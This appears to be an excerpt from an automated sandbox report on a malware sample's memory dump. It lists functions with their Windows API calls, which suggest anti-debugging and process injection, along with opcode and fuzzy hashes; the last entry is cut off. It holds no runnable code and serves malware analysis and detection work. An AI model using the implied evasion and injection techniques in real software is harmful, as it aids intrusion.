                                        APIs
                                          • Part of subcall function 020F6DE7: LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,020F09FC,00000000,00000000,00000000,00000000), ref: 020F0A92
                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,?,?,?,?,?,?,?), ref: 020F41CA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: InformationLibraryLoadProcessTerminateThread
                                        • String ID:
                                        • API String ID: 1761224837-0
                                        • Opcode ID: 570be3a962711e1917616e0a61ce41763caacd76765a7934ed2e076cf720bd24
                                        • Instruction ID: 0d503fc10573f96490a0f2a6483a16e30e4979cccc8ec9f412fcc1e3afd7c842
                                        • Opcode Fuzzy Hash: 570be3a962711e1917616e0a61ce41763caacd76765a7934ed2e076cf720bd24
                                        • Instruction Fuzzy Hash: 6822BD707C0345AAFFF11A24CC957EE36A7AF42360F644129EF46979C0D7BA88C5E602
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F3AAE, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 182librarynativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 020F3E21
                                        • LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoadMemoryVirtualWrite
                                        • String ID: E
                                        • API String ID: 3569954152-3568589458
                                        • Opcode ID: 44eef24fedde43eb8c3579e1aef9fb5c6e74a381d149d31ee233386f8f822940
                                        • Instruction ID: 9f91680d19fad3d8d4a997e1bdae7fe6f29337b8feb4e7497521824a9a77da33
                                        • Opcode Fuzzy Hash: 44eef24fedde43eb8c3579e1aef9fb5c6e74a381d149d31ee233386f8f822940
                                        • Instruction Fuzzy Hash: 955106702807896AFFE61F24CC917ED3AA6EF01364F940069FF86965D0C7B998C4E641
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F1083, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178COMMON
                                        Download Yara Rule
                                        APIs
                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,?,?,?,?,?,?,?), ref: 020F41CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ProcessTerminate
                                        • String ID: E
                                        • API String ID: 560597551-3568589458
                                        • Opcode ID: 0adc3e4b4802894f3de22f47ad03491842787318279f7662fca6550d29e7bdfd
                                        • Instruction ID: 2baa6687d2e25507702b14cf1e2569e0e2a0cb688fca8f427736b72f32eee3a4
                                        • Opcode Fuzzy Hash: 0adc3e4b4802894f3de22f47ad03491842787318279f7662fca6550d29e7bdfd
                                        • Instruction Fuzzy Hash: 9B51CE209C4385E7EFF615284D683EE66975F433A0F6C422ECF5A97CC1C76A8485A602
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F3AEC, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 176COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: E
                                        • API String ID: 0-3568589458
                                        • Opcode ID: 23337c30929193dd7b42109c961c40ebe6d9debbed148bed34843ba45736664b
                                        • Instruction ID: 6e8a61dc2cf00f70c49e4ae5e316c6e47d497fb44fbda5e01ebf723bf251848e
                                        • Opcode Fuzzy Hash: 23337c30929193dd7b42109c961c40ebe6d9debbed148bed34843ba45736664b
                                        • Instruction Fuzzy Hash: 23511370280789AFEFE65F24CC917ED3AA6EF01324F940069EF86965D0C7B998C4E741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F10D7, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 166COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: E
                                        • API String ID: 0-3568589458
                                        • Opcode ID: 8c470330807b4f534f5d10dd902e4260267a9528d37bb1b6ef11b1653960c6bb
                                        • Instruction ID: c670f56502d0027028af6266db7f4aaa1c5f2a9e0a52ff89dbf42d33ed927cf2
                                        • Opcode Fuzzy Hash: 8c470330807b4f534f5d10dd902e4260267a9528d37bb1b6ef11b1653960c6bb
                                        • Instruction Fuzzy Hash: ED41DE309C4385E7EFF615284D683EE6A961F433B0F6C431ECF6957CC1C76A8486A502
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F41FB, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 162nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,020F09FC,00000000,00000000,00000000,00000000), ref: 020F0A92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: InformationThread
                                        • String ID: 1.!T
                                        • API String ID: 4046476035-3147410236
                                        • Opcode ID: d7e95bca0382dabc3e47f41536f11b64ec59a7de4d9c00bf35e5e3f7ddfc6f57
                                        • Instruction ID: 8324261d0ade8c81923ba1c074d1e59eca058de717dad3caa83e85d8d39ebdc8
                                        • Opcode Fuzzy Hash: d7e95bca0382dabc3e47f41536f11b64ec59a7de4d9c00bf35e5e3f7ddfc6f57
                                        • Instruction Fuzzy Hash: FC51CC70A843459BFBA0AA388C507DD7FA75F02364F98416EDF911B9C6E764C843D741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F0905, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 020F6DE7: LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,020F09FC,00000000,00000000,00000000,00000000), ref: 020F0A92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: InformationLibraryLoadThread
                                        • String ID: 1.!T
                                        • API String ID: 543350213-3147410236
                                        • Opcode ID: 7e255f357e37ef8e60cb534b1e586637c1ee27d2012b915453f576848c2def7a
                                        • Instruction ID: 4d1ce1ad393efdcb7e08dd0161c5a45d56570df71db25e6b31a73013a88452cb
                                        • Opcode Fuzzy Hash: 7e255f357e37ef8e60cb534b1e586637c1ee27d2012b915453f576848c2def7a
                                        • Instruction Fuzzy Hash: 4241CC70A843459BFBA0AA788C503DE3FA74F02368FD8426EDF911B9C6D764C842D742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F97DC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID: E
                                        • API String ID: 947044025-3568589458
                                        • Opcode ID: 143a6728dc8d28e1726c4169a72a49cc4e09b59a40af8f35def91480ad99b1d3
                                        • Instruction ID: 35a43128540aaae09ca12eac862f379fd935237db36ede04c31f41d221390a9e
                                        • Opcode Fuzzy Hash: 143a6728dc8d28e1726c4169a72a49cc4e09b59a40af8f35def91480ad99b1d3
                                        • Instruction Fuzzy Hash: 7B41F430AC874DCEEFE54A6889183BC66D19B42354F9A469BCF534BC94D33544C6E742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F9804, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 139nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID: E
                                        • API String ID: 947044025-3568589458
                                        • Opcode ID: 2375d8b71aba9da7c15098b932067c4072797b8976f9e65bde0430e18274142c
                                        • Instruction ID: ff7cba57cdfc2f75b18fe945706c5f245a3601188010dfd021809f9d124f5c0f
                                        • Opcode Fuzzy Hash: 2375d8b71aba9da7c15098b932067c4072797b8976f9e65bde0430e18274142c
                                        • Instruction Fuzzy Hash: 00410430AC874DCEEFE54A6889183BC66E19B42314F9A469BCF534BC94D33484C6EB42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F982F, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 139nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID: E
                                        • API String ID: 947044025-3568589458
                                        • Opcode ID: 5932f1ff839330c7db25038759f874ad1e2159591a6fd28d0caf119331582de5
                                        • Instruction ID: e69c1462ca4fad696662fda2bb9e8dd8598289b2dead3f1a991a20682991cdfe
                                        • Opcode Fuzzy Hash: 5932f1ff839330c7db25038759f874ad1e2159591a6fd28d0caf119331582de5
                                        • Instruction Fuzzy Hash: DB41E5306C874DDEEFE64A6889187BC66E19B42354F9A069FCF524BC90D33584C6E742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F117A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 138COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 020F6DE7: LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,?,?,?,?,?,?,?), ref: 020F41CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoadProcessTerminate
                                        • String ID: E
                                        • API String ID: 3349790660-3568589458
                                        • Opcode ID: 6a781037a1d418cc3108fa0e65aab7c6650faea23b1ff04870030fd0d863370e
                                        • Instruction ID: 09689437223c0b691e78e8af32844a898c1201698553fe085d2075709c4dfdde
                                        • Opcode Fuzzy Hash: 6a781037a1d418cc3108fa0e65aab7c6650faea23b1ff04870030fd0d863370e
                                        • Instruction Fuzzy Hash: 3C41BF205C4385E7EFF259244D6C3EE66971F433A0F6C4219CF6597CC1C76AC489A502
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F3C06, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 020F3E21
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: MemoryVirtualWrite
                                        • String ID: E
                                        • API String ID: 3527976591-3568589458
                                        • Opcode ID: d406789a9ad0413bccef51eac41a9e38ccec4645b10d50008afa21f8c2bf5704
                                        • Instruction ID: 70cd8babb900cd76268670a7e3a3b2ad0a2a860b1a3641635101c8b991e32840
                                        • Opcode Fuzzy Hash: d406789a9ad0413bccef51eac41a9e38ccec4645b10d50008afa21f8c2bf5704
                                        • Instruction Fuzzy Hash: CE413670240789AFEFE66F24CC957ED3AA6EF01354F940169EF8686990C37948C4E741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F989B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 131COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: E
                                        • API String ID: 0-3568589458
                                        • Opcode ID: 5ae3b4954c3a2e643a22eee8fd506ca9463761a8e314b93ff24e4faa8f3299f7
                                        • Instruction ID: 76c21a6bc4694a2d27cb262615bb7a49ac1687cb313297b31428800f8b0699ec
                                        • Opcode Fuzzy Hash: 5ae3b4954c3a2e643a22eee8fd506ca9463761a8e314b93ff24e4faa8f3299f7
                                        • Instruction Fuzzy Hash: E341E630AC874CDEEFE64A6889187BC66E19F42354F9A469BCF5247C90D33984C6E742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F99D3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 131nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID: E
                                        • API String ID: 947044025-3568589458
                                        • Opcode ID: ae3eb2a8f6c1a77f5d57d87f5366c01be1502cea853ece212c290171674c0a02
                                        • Instruction ID: 4afe46b713afd1326153823cc323659c6a9957ea189559e86c6c480654dfe698
                                        • Opcode Fuzzy Hash: ae3eb2a8f6c1a77f5d57d87f5366c01be1502cea853ece212c290171674c0a02
                                        • Instruction Fuzzy Hash: 2D41EA20548BCC9FEFE2863489187AC6FE45B03358FEC06DECB964B892D72944C6D742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F98D4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID: E
                                        • API String ID: 947044025-3568589458
                                        • Opcode ID: 7fc05a01618b4a99214c8a28e8faf5325ab2ffae2cc684464c07ec20731439e8
                                        • Instruction ID: 5c9c9b958e36bfa1b715866db68c7032887e1e8263a7c5ade2a0c1f32840a8c2
                                        • Opcode Fuzzy Hash: 7fc05a01618b4a99214c8a28e8faf5325ab2ffae2cc684464c07ec20731439e8
                                        • Instruction Fuzzy Hash: E641B230AC874DDEEFE54A6489187BC66E19B02354F9A469FCF524BC90D33984C5EB42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F990D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 121nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID: E
                                        • API String ID: 947044025-3568589458
                                        • Opcode ID: 8a7a0cbe44493187e11b57b716d824218d0298a9af759b6cfa2d892b87bcda28
                                        • Instruction ID: d0fcfa7fce1c7d1081f1f9919ff70558786895a245949429aa0b939acc24f957
                                        • Opcode Fuzzy Hash: 8a7a0cbe44493187e11b57b716d824218d0298a9af759b6cfa2d892b87bcda28
                                        • Instruction Fuzzy Hash: 1941C330AC874DDEEFE54A6889187BC66E19F02354F9A469BCF524BC90D33584C5EB82
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F9941, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID: E
                                        • API String ID: 947044025-3568589458
                                        • Opcode ID: cfdd43ec6e4810539f245fee6f8458964ae904679bdaeeeaa4a48132c65c6be3
                                        • Instruction ID: 2bd3d19c3879b6db016b6b1dd7111fe56d650210877bd952696719c10ac69fda
                                        • Opcode Fuzzy Hash: cfdd43ec6e4810539f245fee6f8458964ae904679bdaeeeaa4a48132c65c6be3
                                        • Instruction Fuzzy Hash: C141D5309C874DDEEFE54A2489187BC76E09B02354F9A469BCF5247CA4D33584C6E782
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F3C6F, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 116nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 020F3E21
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: MemoryVirtualWrite
                                        • String ID: E
                                        • API String ID: 3527976591-3568589458
                                        • Opcode ID: e02ee3948476a5f9f15a72c3b87e986fe88adf56ed99f7c7b213ae589b6d1c6c
                                        • Instruction ID: c3c664b387c327cf52febe8e88d730b2a37ee0b66c9dc1f17389d312d78b0f64
                                        • Opcode Fuzzy Hash: e02ee3948476a5f9f15a72c3b87e986fe88adf56ed99f7c7b213ae589b6d1c6c
                                        • Instruction Fuzzy Hash: 7D4105702407C96FEFF66F24CC917DD3AA6AF05364F9801A9EF8686990C77858C4E741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F996B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID: E
                                        • API String ID: 947044025-3568589458
                                        • Opcode ID: 0a63ff97c401f274bb1be791b8f49d98a42d9eab5f444f58a3d5f4b1dd59fb2e
                                        • Instruction ID: 113dfae931addf8e1e8b71721c208b6ccb363176429f497464c518d36769703d
                                        • Opcode Fuzzy Hash: 0a63ff97c401f274bb1be791b8f49d98a42d9eab5f444f58a3d5f4b1dd59fb2e
                                        • Instruction Fuzzy Hash: D03105309C874DDEEFF54A2489183BC36E09B02254F9E469BCF924BC94D33540C6EB82
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F9998, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID: E
                                        • API String ID: 947044025-3568589458
                                        • Opcode ID: 434b21120683e71d06a69b89d10295e0fcae5ecdd55a7860f41c41c361992b13
                                        • Instruction ID: 741ad9ee7b39fc67caaad81cc865fcb544e77c2fb8feeaa6f422fd178e83188e
                                        • Opcode Fuzzy Hash: 434b21120683e71d06a69b89d10295e0fcae5ecdd55a7860f41c41c361992b13
                                        • Instruction Fuzzy Hash: 1231A43098878CDEEFE54B6489187BC67E09B02354F9D469BCF924B891D33944C6EB82
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F3CC8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104librarynativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 020F3E21
                                        • LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoadMemoryVirtualWrite
                                        • String ID: E
                                        • API String ID: 3569954152-3568589458
                                        • Opcode ID: 5b5b4fc1e681e88de2dfee7d8221cca15632a418194e2dd05d8a0800e97cf090
                                        • Instruction ID: bc7856161978bb2321433b5cb48041c736ce922073ec2fe1b080e3bb646391ae
                                        • Opcode Fuzzy Hash: 5b5b4fc1e681e88de2dfee7d8221cca15632a418194e2dd05d8a0800e97cf090
                                        • Instruction Fuzzy Hash: 1E3112B0240789AFEFE66F24CC907DD3AA6EF05314F980168EF8A8A590C7B858C4D741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F9A7A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID: E
                                        • API String ID: 947044025-3568589458
                                        • Opcode ID: 1207091f89bf562ea6c411c1d770174f5339d3aeefc42f57bcb79cc1658af7ec
                                        • Instruction ID: cd42953f81875d8d8ff5149bf622c003515efd9dad8a69aab184738a3e3b38d8
                                        • Opcode Fuzzy Hash: 1207091f89bf562ea6c411c1d770174f5339d3aeefc42f57bcb79cc1658af7ec
                                        • Instruction Fuzzy Hash: 3231C23098874DDEEFE64A6489187BC2AE19B02264F9D478BCF924BCE5D33540C6E742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F9B4B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 92nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID: E
                                        • API String ID: 947044025-3568589458
                                        • Opcode ID: e50233c07e138fa21c9f7d71922604d4948c1e4678bae438becfb43c28c5d2c6
                                        • Instruction ID: 386ccc4b3a5567d6b08ff6de1acb08c6088c0556919491b2b39eee3b4a5b54cf
                                        • Opcode Fuzzy Hash: e50233c07e138fa21c9f7d71922604d4948c1e4678bae438becfb43c28c5d2c6
                                        • Instruction Fuzzy Hash: C731C821988B8C9FEFE28A34891876C7FE45B03258F9D46DFCB964B891D32544C6D742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F9AB1, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID: E
                                        • API String ID: 947044025-3568589458
                                        • Opcode ID: 8ef3abc678b46a9a54b1ed37f94681c90b834e8d1c9a12c77e8e44fb892d63cf
                                        • Instruction ID: b5f8531ac411bc8836cb2f202ca65122943c50e544618fea09c4bcdc0cb61748
                                        • Opcode Fuzzy Hash: 8ef3abc678b46a9a54b1ed37f94681c90b834e8d1c9a12c77e8e44fb892d63cf
                                        • Instruction Fuzzy Hash: D931D53098874CDEDFE54A6489187BC26E05F02354F99468ACF5207CA4D33540CAE742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F3D3C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88librarynativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 020F3E21
                                        • LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoadMemoryVirtualWrite
                                        • String ID: E
                                        • API String ID: 3569954152-3568589458
                                        • Opcode ID: 44722973f78f48aa168213829f6ba768ec1ef6a8e1b9e5d0c9f8ab80f9455984
                                        • Instruction ID: 0ea29c560e4486d2b8d29952c4d051de0a76a4ab963973329f947d7736cd75bd
                                        • Opcode Fuzzy Hash: 44722973f78f48aa168213829f6ba768ec1ef6a8e1b9e5d0c9f8ab80f9455984
                                        • Instruction Fuzzy Hash: 6031F6B0644BC96FEFE69F34CC907DD3FA6AF02314FA801A9EF958A591C7294884D741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F9B0D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 84nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID: E
                                        • API String ID: 947044025-3568589458
                                        • Opcode ID: 4efe71d0d312d789ce34548207e0e8223203965685525ccc1f1a3415ae0bb4d8
                                        • Instruction ID: 7201f80914ca3e9e41de60c3f46e279e005fe48fd9e73142faba0d113a1ac922
                                        • Opcode Fuzzy Hash: 4efe71d0d312d789ce34548207e0e8223203965685525ccc1f1a3415ae0bb4d8
                                        • Instruction Fuzzy Hash: 6821B63198878CDEEFE19B7489187BC7AE05F02258F9D46DBCB560B8A1D33544C9E742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F9AE5, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID: E
                                        • API String ID: 947044025-3568589458
                                        • Opcode ID: ef59ee643b8e82df1698a5f7cce60ef1581c9633e52ce40114961da286d2ce5f
                                        • Instruction ID: 7e3e6a1cec4e22451dc221420646a8092e54c9ae47c1520bdc9e86aa367d5f9d
                                        • Opcode Fuzzy Hash: ef59ee643b8e82df1698a5f7cce60ef1581c9633e52ce40114961da286d2ce5f
                                        • Instruction Fuzzy Hash: EC21D33198878CDEEFE18A6489187BC2AE05B02268F99468BCF52078A4D33540CAE742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F9C2E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID: E
                                        • API String ID: 947044025-3568589458
                                        • Opcode ID: 0ba2aa8f3ea157cf46380d4130e18e780c08697135957e1bc781411c107e8de1
                                        • Instruction ID: 3b40e62a8744406a1bb4a8620c07e6c0eac28bac3c2136c6859859cd75854404
                                        • Opcode Fuzzy Hash: 0ba2aa8f3ea157cf46380d4130e18e780c08697135957e1bc781411c107e8de1
                                        • Instruction Fuzzy Hash: A821D8619897CD9FEFE2963449183AC2FA44F03258F9D05DFCB924B896D329448AD742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F9BB3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID: E
                                        • API String ID: 947044025-3568589458
                                        • Opcode ID: 177bb02e43fafa703f243fc715fb66b925acba56eb7ee4adbaf20db3b6593319
                                        • Instruction ID: 99bf60169d55078cbc93b9810da50b8b2724484659bdc79b0987308769a26709
                                        • Opcode Fuzzy Hash: 177bb02e43fafa703f243fc715fb66b925acba56eb7ee4adbaf20db3b6593319
                                        • Instruction Fuzzy Hash: F321D82098478CDEDFF28A3485187AC2AD45B03258F9D46CFCF920B891D33544CAD742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F3D8C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75librarynativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 020F3E21
                                        • LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoadMemoryVirtualWrite
                                        • String ID: `
